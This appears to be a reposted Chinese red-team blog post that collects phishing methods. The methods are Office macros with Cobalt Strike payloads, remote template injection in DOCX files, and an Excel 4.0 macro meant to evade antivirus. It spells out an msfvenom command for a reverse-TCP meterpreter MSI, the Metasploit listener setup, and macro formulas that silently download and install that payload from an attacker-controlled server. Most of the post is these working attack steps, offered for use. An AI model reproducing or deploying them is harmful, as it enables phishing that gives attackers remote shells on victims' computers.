红队常用钓鱼方式收集

admin 2022年7月28日09:41:31评论136 views字数 866阅读2分53秒阅读模式

0x01 Office钓鱼攻击

CS生成Office Payload

红队常用钓鱼方式收集

复制好我们的宏代码以后,我们去word里新建一个文件,创建我们需要的宏,宏的位置需要改成当前文件

红队常用钓鱼方式收集

复制好我们CS生成的宏代码到这里,然后改成Auto_Open,保存为dotm文件

红队常用钓鱼方式收集

红队常用钓鱼方式收集

红队常用钓鱼方式收集

右键->打开并且点击启用宏即可CS上线


0x02 利用DOCX文档远程模板注入执行宏

前几步和第一种一样,后面还需要加一点内容,首先要把生成的dotm放到我们的服务器上。生成一个docx文件,把文件后缀名改成zip后解压,比如1.docx改成1.zip解压,在word_rels文件夹下有一个setting文件,把里面的target的值改成你个人服务器上的dotm文件

红队常用钓鱼方式收集

红队常用钓鱼方式收集

如上图,然后把整个文件夹压缩成zip文件 然后把zip改成docx右键打开即可上线

红队常用钓鱼方式收集


0x03 Excel4.0宏躲避杀软检测

首先使用MSF生成MSI文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.169.128 lport=1234 -f msi -o hack.msi

开启监听:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.169.128
set lport 1234
run

新建一个excel文件,创建一个MSExcel4.0宏表,分别在A1和A2单元格输入如下代码,并且把A1单元格命名为Auto_Open

=EXEC("msiexec /q /i http://192.168.169.128:8000/hack.msi")
=HALT()

红队常用钓鱼方式收集

红队常用钓鱼方式收集

右键打开启用宏即可MSF上线

红队常用钓鱼方式收集

From:https://ch1e.gitee.io

往期推荐 

// 1

【PyHacker编写指南】网站Cms识别工具

// 2

渗透测试如何利用403页面

// 3

记一次智慧校园系统一轮游

// 4

| 从钓鱼网站到某大厂存储型XSS

原文始发于微信公众号(巡安似海):红队常用钓鱼方式收集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月28日09:41:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队常用钓鱼方式收集http://cn-sec.com/archives/1205798.html

发表评论

匿名网友 填写信息